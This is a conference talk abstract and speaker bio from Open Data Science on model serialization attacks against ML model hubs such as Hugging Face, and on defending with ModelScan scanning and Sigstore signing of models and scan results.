Trojan Model Hubs: Hacking ML Supply Chains & Defending Yourself from Threats


Increasingly, ML practitioners have become reliant on public model hubs like Hugging Face for downloading foundation models to fine tune. However, due to the open nature of model hubs, compromised artifacts are very easy to share and distribute. Most ML model formats are inherently vulnerable to Model Serialization Attacks (MSA), the injection of malicious code that will execute automatically when the model file is deserialized. MSAs are the Trojan horses of ML, capable of turning a seemingly innocuous model into a backdoor to your whole system. An attacker could download a popular model, inject malicious code, and upload it under a similar name to trick consumers. This problem is not purely theoretical: 3,354 public models on Hugging Face today are capable of arbitrary code execution upon serialization, 41% of which are not flagged as unsafe by Hugging Face. Even beyond the risk of public registries, privately created models can also be subject of MSAs if their storage system is infiltrated by swapping out a safe model for one that makes identical inferences but also executes malicious code.

So, what can you do about it? In this talk, we will explore two strategies to mitigate the risk of MSAs and other attacks involving compromised artifacts: model scanning and cryptographic signing. Model scanning is our window into the black boxes that are model files. By scanning the model before deserialization, we can examine the operators and layers it uses to determine whether it contains suspicious code, without actually unpacking it and becoming vulnerable to the attack. In addition, cryptographic attestation can link an artifact to a source’s identity, backed up by a trusted authority. A model can be signed on creation, then whenever it’s used, users can verify the signature to establish integrity and authenticity. Scan results can also be signed, verifying that the creator ensured the model was safe from malicious code at the time of signing.

Both scanning and signatures are industry standard for most software artifacts. Many of us are very familiar with typical antivirus scans, or with signing and attesting container images when pushing or pulling from a container registry. These practices can easily map to ML artifacts, aided by advances in open-source security tools. We show how you can use ModelScan to scan for MSA, and then use Sigstore to sign models and scan results, backed up by an immutable public ledger. With practices like these, we can stop the MSA Trojan Horses at the gates and make ML more secure for everyone.


William is a Senior Software Engineer at Protect AI, where he is building systems to help ML engineers and data scientists introduce security into their MLOps workflows effortlessly. Previously, he led a team at AWS working on application observability and distributed tracing. During that time he contributed to the industry-wide OpenTelemetry standard and helped lead the effort to release an AWS-supported distribution of it. He is passionate about making the observability and security of AI-enabled applications as seamless as possible.

Open Data Science




Open Data Science
One Broadway
Cambridge, MA 02142

Privacy Settings
We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
Consent to display content from - Youtube
Consent to display content from - Vimeo
Google Maps
Consent to display content from - Google